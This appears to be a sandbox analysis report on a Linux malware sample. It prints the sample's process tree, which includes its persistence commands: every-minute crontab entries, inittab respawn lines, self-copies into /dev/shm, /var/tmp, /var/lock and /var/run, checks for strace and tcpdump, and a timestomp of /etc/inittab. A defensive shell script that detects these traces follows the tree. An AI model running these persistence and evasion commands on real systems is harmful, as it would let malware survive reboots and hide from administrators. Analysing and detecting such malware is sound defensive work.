Analysis

  • max time kernel: 0s
  • max time network: 102s
  • platform: linux_amd64
  • resource: ubuntu1804-amd64-en-20211208
  • submitted: 14-03-2022 02:35

General

  • Target: 582a434ba0f2e04bd8b5495c50320068
  • Size: 98KB
  • MD5: 582a434ba0f2e04bd8b5495c50320068
  • SHA1: b3888d650646aa63423765e686a14ddc82ee52be
  • SHA256: 7d3855bb09f2f6111d6c71e06e1e6b06dd47b1dade49af0235b220966c2f5be3
  • SHA512: 5d4075888d1414f57edd832c6fb7151103af441eafebfdeb97be077bcfa504429f792c1fb23f18674aaf94ba1c6fa8d42e7c73a0d7f2d845f7d9faa605ac6fe4

Score
9/10

Signatures

  • Writes file to system bin folder (1 TTPs, 3 IoCs)
  • Modifies rc script (1 TTPs, 1 IoCs)

    Adding/modifying system rc scripts is a common persistence mechanism.

  • Write file to user bin folder (1 TTPs, 2 IoCs)
  • Reads runtime system information (4 IoCs)

    Reads data from /proc virtual filesystem.

  • Writes file to tmp directory (5 IoCs)

    Malware often drops required files in the /tmp directory.

Processes

  • ./582a434ba0f2e04bd8b5495c50320068
    ./582a434ba0f2e04bd8b5495c50320068
    1⤵
    • Modifies rc script
    • Writes file to tmp directory
    PID:593
  • /bin/sh
    sh -c "pidof -x strace > /dev/null"
    1⤵
    PID:594
    • /bin/pidof
      pidof -x strace
      2⤵
      PID:595
  • /bin/sh
    sh -c "pidof -x tcpdump > /dev/null"
    1⤵
    PID:596
    • /bin/pidof
      pidof -x tcpdump
      2⤵
      PID:597
  • /bin/sh
    sh -c "cat /etc/inittab | grep -v \"/tmp/582a434ba0f2e04bd8b5495c50320068\" > /etc/inittab2"
    1⤵
    PID:600
    • /bin/cat
      cat /etc/inittab
      2⤵
      PID:602
    • /bin/grep
      grep -v /tmp/582a434ba0f2e04bd8b5495c50320068
      2⤵
      PID:604
  • /bin/sh
    sh -c "crontab -l | grep /tmp/582a434ba0f2e04bd8b5495c50320068 | grep -v \"no cron\" || (crontab -l ; echo \"* * * * * /tmp/582a434ba0f2e04bd8b5495c50320068 > /dev/null 2>&1 &\") | crontab -"
    1⤵
    PID:601
    • /usr/bin/crontab
      crontab -l
      2⤵
      PID:605
    • /bin/grep
      grep /tmp/582a434ba0f2e04bd8b5495c50320068
      2⤵
      PID:607
    • /bin/grep
      grep -v "no cron"
      2⤵
      PID:608
    • /usr/bin/crontab
      crontab -
      2⤵
      PID:612
  • /bin/sh
    sh -c "crontab -r"
    1⤵
    PID:603
    • /usr/bin/crontab
      crontab -r
      2⤵
      PID:606
  • /bin/sh
    sh -c "echo \"0:2345:respawn:/tmp/582a434ba0f2e04bd8b5495c50320068\" >> /etc/inittab2"
    1⤵
    PID:609
  • /bin/sh
    sh -c "cat /etc/inittab2 > /etc/inittab"
    1⤵
    PID:610
    • /bin/cat
      cat /etc/inittab2
      2⤵
      PID:613
  • /usr/bin/crontab
    crontab -l
    1⤵
    PID:614
  • /bin/sh
    sh -c "rm -rf /etc/inittab2"
    1⤵
    PID:615
    • /bin/rm
      rm -rf /etc/inittab2
      2⤵
      PID:616
  • /bin/sh
    sh -c "touch -acmr /bin/ls /etc/inittab"
    1⤵
    PID:617
    • /usr/bin/touch
      touch -acmr /bin/ls /etc/inittab
      2⤵
      PID:618
  • /bin/sh
    sh -c "/bin/uname -n"
    1⤵
    PID:621
    • /bin/uname
      /bin/uname -n
      2⤵
      PID:623
  • /bin/sh
    sh -c "cp -f /tmp/582a434ba0f2e04bd8b5495c50320068 /dev/shm/582a434ba0f2e04bd8b5495c50320068"
    1⤵
    PID:622
    • /bin/cp
      cp -f /tmp/582a434ba0f2e04bd8b5495c50320068 /dev/shm/582a434ba0f2e04bd8b5495c50320068
      2⤵
      • Reads runtime system information
      • Writes file to tmp directory
      PID:624
  • /bin/sh
    sh -c "cat /etc/inittab | grep -v \"/dev/shm/582a434ba0f2e04bd8b5495c50320068\" > /etc/inittab2"
    1⤵
    PID:626
    • /bin/cat
      cat /etc/inittab
      2⤵
      PID:628
    • /bin/grep
      grep -v /dev/shm/582a434ba0f2e04bd8b5495c50320068
      2⤵
      PID:629
  • /bin/sh
    sh -c "crontab -l | grep /dev/shm/582a434ba0f2e04bd8b5495c50320068 | grep -v \"no cron\" || (crontab -l ; echo \"* * * * * /dev/shm/582a434ba0f2e04bd8b5495c50320068 > /dev/null 2>&1 &\") | crontab -"
    1⤵
    PID:627
    • /bin/grep
      grep /dev/shm/582a434ba0f2e04bd8b5495c50320068
      2⤵
      PID:631
    • /usr/bin/crontab
      crontab -l
      2⤵
      PID:630
    • /bin/grep
      grep -v "no cron"
      2⤵
      PID:636
    • /usr/bin/crontab
      crontab -
      2⤵
      PID:640
  • /bin/sh
    sh -c "echo \"0:2345:respawn:/dev/shm/582a434ba0f2e04bd8b5495c50320068\" >> /etc/inittab2"
    1⤵
    PID:637
  • /bin/sh
    sh -c "cat /etc/inittab2 > /etc/inittab"
    1⤵
    PID:638
    • /bin/cat
      cat /etc/inittab2
      2⤵
      PID:641
  • /usr/bin/crontab
    crontab -l
    1⤵
    PID:642
  • /bin/sh
    sh -c "rm -rf /etc/inittab2"
    1⤵
    PID:643
    • /bin/rm
      rm -rf /etc/inittab2
      2⤵
      PID:644
  • /bin/sh
    sh -c "touch -acmr /bin/ls /etc/inittab"
    1⤵
    PID:645
    • /usr/bin/touch
      touch -acmr /bin/ls /etc/inittab
      2⤵
      PID:646
  • /bin/sh
    sh -c "cp -f /tmp/582a434ba0f2e04bd8b5495c50320068 /var/tmp/582a434ba0f2e04bd8b5495c50320068"
    1⤵
    PID:647
    • /bin/cp
      cp -f /tmp/582a434ba0f2e04bd8b5495c50320068 /var/tmp/582a434ba0f2e04bd8b5495c50320068
      2⤵
      • Reads runtime system information
      • Writes file to tmp directory
      PID:648
  • /bin/sh
    sh -c "cat /etc/inittab | grep -v \"/var/tmp/582a434ba0f2e04bd8b5495c50320068\" > /etc/inittab2"
    1⤵
    PID:650
    • /bin/cat
      cat /etc/inittab
      2⤵
      PID:652
    • /bin/grep
      grep -v /var/tmp/582a434ba0f2e04bd8b5495c50320068
      2⤵
      PID:653
  • /bin/sh
    sh -c "crontab -l | grep /var/tmp/582a434ba0f2e04bd8b5495c50320068 | grep -v \"no cron\" || (crontab -l ; echo \"* * * * * /var/tmp/582a434ba0f2e04bd8b5495c50320068 > /dev/null 2>&1 &\") | crontab -"
    1⤵
    PID:651
    • /usr/bin/crontab
      crontab -l
      2⤵
      PID:654
    • /bin/grep
      grep /var/tmp/582a434ba0f2e04bd8b5495c50320068
      2⤵
      PID:655
    • /bin/grep
      grep -v "no cron"
      2⤵
      PID:656
    • /usr/bin/crontab
      crontab -
      2⤵
      PID:660
  • /bin/sh
    sh -c "echo \"0:2345:respawn:/var/tmp/582a434ba0f2e04bd8b5495c50320068\" >> /etc/inittab2"
    1⤵
    PID:657
  • /bin/sh
    sh -c "cat /etc/inittab2 > /etc/inittab"
    1⤵
    PID:658
    • /bin/cat
      cat /etc/inittab2
      2⤵
      PID:662
  • /usr/bin/crontab
    crontab -l
    1⤵
    PID:661
  • /bin/sh
    sh -c "rm -rf /etc/inittab2"
    1⤵
    PID:663
    • /bin/rm
      rm -rf /etc/inittab2
      2⤵
      PID:664
  • /bin/sh
    sh -c "touch -acmr /bin/ls /etc/inittab"
    1⤵
    PID:665
    • /usr/bin/touch
      touch -acmr /bin/ls /etc/inittab
      2⤵
      PID:666
  • /bin/sh
    sh -c "cp -f /tmp/582a434ba0f2e04bd8b5495c50320068 /var/lock/582a434ba0f2e04bd8b5495c50320068"
    1⤵
    PID:667
    • /bin/cp
      cp -f /tmp/582a434ba0f2e04bd8b5495c50320068 /var/lock/582a434ba0f2e04bd8b5495c50320068
      2⤵
      • Reads runtime system information
      • Writes file to tmp directory
      PID:668
  • /bin/sh
    sh -c "cat /etc/inittab | grep -v \"/var/lock/582a434ba0f2e04bd8b5495c50320068\" > /etc/inittab2"
    1⤵
    PID:670
    • /bin/cat
      cat /etc/inittab
      2⤵
      PID:672
    • /bin/grep
      grep -v /var/lock/582a434ba0f2e04bd8b5495c50320068
      2⤵
      PID:673
  • /bin/sh
    sh -c "crontab -l | grep /var/lock/582a434ba0f2e04bd8b5495c50320068 | grep -v \"no cron\" || (crontab -l ; echo \"* * * * * /var/lock/582a434ba0f2e04bd8b5495c50320068 > /dev/null 2>&1 &\") | crontab -"
    1⤵
    PID:671
    • /usr/bin/crontab
      crontab -l
      2⤵
      PID:674
    • /bin/grep
      grep /var/lock/582a434ba0f2e04bd8b5495c50320068
      2⤵
      PID:675
    • /bin/grep
      grep -v "no cron"
      2⤵
      PID:677
    • /usr/bin/crontab
      crontab -
      2⤵
      PID:680
  • /bin/sh
    sh -c "echo \"0:2345:respawn:/var/lock/582a434ba0f2e04bd8b5495c50320068\" >> /etc/inittab2"
    1⤵
    PID:676
  • /bin/sh
    sh -c "cat /etc/inittab2 > /etc/inittab"
    1⤵
    PID:678
    • /bin/cat
      cat /etc/inittab2
      2⤵
      PID:681
  • /usr/bin/crontab
    crontab -l
    1⤵
    PID:682
  • /bin/sh
    sh -c "rm -rf /etc/inittab2"
    1⤵
    PID:683
    • /bin/rm
      rm -rf /etc/inittab2
      2⤵
      PID:684
  • /bin/sh
    sh -c "touch -acmr /bin/ls /etc/inittab"
    1⤵
    PID:685
    • /usr/bin/touch
      touch -acmr /bin/ls /etc/inittab
      2⤵
      PID:686
  • /bin/sh
    sh -c "cp -f /tmp/582a434ba0f2e04bd8b5495c50320068 /var/run/582a434ba0f2e04bd8b5495c50320068"
    1⤵
    PID:687
    • /bin/cp
      cp -f /tmp/582a434ba0f2e04bd8b5495c50320068 /var/run/582a434ba0f2e04bd8b5495c50320068
      2⤵
      • Reads runtime system information
      • Writes file to tmp directory
      PID:688
                                                                                                                                                          • /bin/sh
                                                                                                                                                            sh -c "cat /etc/inittab | grep -v \"/var/run/582a434ba0f2e04bd8b5495c50320068\" > /etc/inittab2"
                                                                                                                                                            1⤵
                                                                                                                                                              PID:690
                                                                                                                                                              • /bin/cat
                                                                                                                                                                cat /etc/inittab
                                                                                                                                                                2⤵
                                                                                                                                                                  PID:692
                                                                                                                                                                • /bin/grep
                                                                                                                                                                  grep -v /var/run/582a434ba0f2e04bd8b5495c50320068
                                                                                                                                                                  2⤵
                                                                                                                                                                    PID:694
                                                                                                                                                                • /bin/sh
                                                                                                                                                                  sh -c "crontab -l | grep /var/run/582a434ba0f2e04bd8b5495c50320068 | grep -v \"no cron\" || (crontab -l ; echo \"* * * * * /var/run/582a434ba0f2e04bd8b5495c50320068 > /dev/null 2>&1 &\") | crontab -"
                                                                                                                                                                  1⤵
                                                                                                                                                                    PID:691
                                                                                                                                                                    • /usr/bin/crontab
                                                                                                                                                                      crontab -l
                                                                                                                                                                      2⤵
                                                                                                                                                                        PID:693
                                                                                                                                                                      • /bin/grep
                                                                                                                                                                        grep /var/run/582a434ba0f2e04bd8b5495c50320068
                                                                                                                                                                        2⤵
                                                                                                                                                                          PID:695
                                                                                                                                                                        • /bin/grep
                                                                                                                                                                          grep -v "no cron"
                                                                                                                                                                          2⤵
                                                                                                                                                                            PID:696
                                                                                                                                                                          • /usr/bin/crontab
                                                                                                                                                                            crontab -
                                                                                                                                                                            2⤵
                                                                                                                                                                              PID:699
                                                                                                                                                                          • /bin/sh
                                                                                                                                                                            sh -c "echo \"0:2345:respawn:/var/run/582a434ba0f2e04bd8b5495c50320068\" >> /etc/inittab2"
                                                                                                                                                                            1⤵
                                                                                                                                                                              PID:697
                                                                                                                                                                            • /bin/sh
                                                                                                                                                                              sh -c "cat /etc/inittab2 > /etc/inittab"
                                                                                                                                                                              1⤵
                                                                                                                                                                                PID:700
                                                                                                                                                                                • /bin/cat
                                                                                                                                                                                  cat /etc/inittab2
                                                                                                                                                                                  2⤵
                                                                                                                                                                                    PID:702
                                                                                                                                                                                • /usr/bin/crontab
                                                                                                                                                                                  crontab -l
                                                                                                                                                                                  1⤵
                                                                                                                                                                                    PID:701
                                                                                                                                                                                  • /bin/sh
                                                                                                                                                                                    sh -c "rm -rf /etc/inittab2"
                                                                                                                                                                                    1⤵
                                                                                                                                                                                      PID:703
                                                                                                                                                                                      • /bin/rm
                                                                                                                                                                                        rm -rf /etc/inittab2
                                                                                                                                                                                        2⤵
                                                                                                                                                                                          PID:704
                                                                                                                                                                                      • /bin/sh
                                                                                                                                                                                        sh -c "touch -acmr /bin/ls /etc/inittab"
                                                                                                                                                                                        1⤵
                                                                                                                                                                                          PID:705
                                                                                                                                                                                          • /usr/bin/touch
                                                                                                                                                                                            touch -acmr /bin/ls /etc/inittab
                                                                                                                                                                                            2⤵
                                                                                                                                                                                              PID:706
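The process tree above records one complete persistence cycle: the sample copies itself from /tmp to /var/run, filters its own path out of /etc/inittab into /etc/inittab2, appends a respawn entry for the new path, installs a crontab line that relaunches it every minute (the `grep -v "no cron"` step only exists to swallow the "no crontab for user" message so the `||` branch fires), writes inittab2 back over /etc/inittab, deletes the scratch file, and finally runs `touch -acmr /bin/ls /etc/inittab` so the rewritten file inherits the access and modification times of /bin/ls. The POSIX shell script below is an added detection example and is not part of the sandbox report or of the sample; it recreates that end state in constructed files under a temporary directory and checks for the three indicators (a respawn entry executing from a staging directory, an every-minute cron entry executing from one, and a config file whose mtime exactly equals a reference binary's). The STAGING_DIRS list, the sample file contents and the helper names are assumptions made for illustration.

```shell
#!/bin/sh
# Added detection example for the inittab/crontab persistence and the
# touch -acmr timestomp seen in the process tree. Paths are parameters so it
# runs here against constructed sample files; on a host, point the grep
# helpers at /etc/inittab and at `crontab -l` output, and compare
# /etc/inittab against /bin/ls with mtime_matches.

# Directories that a legitimate inittab or cron entry should not execute
# from (assumed list; extend for your environment).
STAGING_DIRS='/tmp/|/var/run/|/dev/shm/'

# Print respawn entries (inittab format id:runlevels:action:process) whose
# process path lives in a staging directory. grep's status is the result:
# 0 if anything matched, 1 otherwise.
find_suspicious_inittab_entries() {
    grep -E "^[^:#]*:[^:]*:respawn:.*(${STAGING_DIRS})" "$1"
}

# Print every-minute cron lines (* * * * *) that run something from a
# staging directory. The final grep -v mirrors the "no cron" filter the
# sample itself applies to `crontab -l` output.
find_suspicious_cron_entries() {
    grep -E '^\*[[:space:]]+\*[[:space:]]+\*[[:space:]]+\*[[:space:]]+\*[[:space:]]' "$1" \
        | grep -E "(${STAGING_DIRS})" \
        | grep -v 'no cron'
}

# touch -acmr REF FILE copies REF's atime and mtime onto FILE, so a config
# file whose mtime equals a system binary's is suspicious. -nt and -ot
# compare mtimes; when neither holds the two are identical.
mtime_matches() {
    [ ! "$1" -nt "$2" ] && [ ! "$1" -ot "$2" ]
}

# ---- constructed sample data (not taken from a real host) ----
SAMPLE_DIR=$(mktemp -d)
trap 'rm -rf "$SAMPLE_DIR"' EXIT
SAMPLE_INITTAB="$SAMPLE_DIR/inittab"
SAMPLE_CRON="$SAMPLE_DIR/crontab.txt"
SAMPLE_REF="$SAMPLE_DIR/ls"          # stands in for /bin/ls

cat > "$SAMPLE_INITTAB" <<'EOF'
# constructed /etc/inittab after the sample rewrote it
id:2:initdefault:
si::sysinit:/etc/init.d/rcS
1:2345:respawn:/sbin/getty 38400 tty1
0:2345:respawn:/var/run/582a434ba0f2e04bd8b5495c50320068
EOF

cat > "$SAMPLE_CRON" <<'EOF'
# constructed `crontab -l` output after the sample added its line
0 3 * * * /usr/bin/logrotate /etc/logrotate.conf
* * * * * /var/run/582a434ba0f2e04bd8b5495c50320068 > /dev/null 2>&1 &
EOF

# Reproduce the timestomp: give the sample inittab the reference's times.
printf 'x' > "$SAMPLE_REF"
touch -r "$SAMPLE_REF" "$SAMPLE_INITTAB"

# Hit counters so callers get a number rather than a stream of lines.
count_inittab_hits() { find_suspicious_inittab_entries "$SAMPLE_INITTAB" | wc -l | tr -d ' '; }
count_cron_hits()    { find_suspicious_cron_entries    "$SAMPLE_CRON"    | wc -l | tr -d ' '; }

# Stand-alone run: report each indicator that fires on the sample files.
if [ "$(count_inittab_hits)" -gt 0 ]; then
    echo "[!] respawn entries executing from a staging directory:"
    find_suspicious_inittab_entries "$SAMPLE_INITTAB"
fi
if [ "$(count_cron_hits)" -gt 0 ]; then
    echo "[!] every-minute cron entries executing from a staging directory:"
    find_suspicious_cron_entries "$SAMPLE_CRON"
fi
if mtime_matches "$SAMPLE_INITTAB" "$SAMPLE_REF"; then
    echo "[!] inittab mtime equals the reference binary's mtime (touch -r timestomp?)"
fi
```

On a live host, run the cron check against `crontab -l` for root and for every user the sample could have run as, since the entry lands in the invoking user's crontab. touch cannot rewrite ctime, so on a timestomped /etc/inittab the ctime (`stat -c %Z` on GNU systems) still shows the real write time while the mtime matches /bin/ls; that mismatch is the stronger signal. Some shells compare -nt/-ot at whole-second resolution, so treat an exact mtime match as a lead to confirm with stat rather than as proof.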

Network

MITRE ATT&CK Enterprise v6
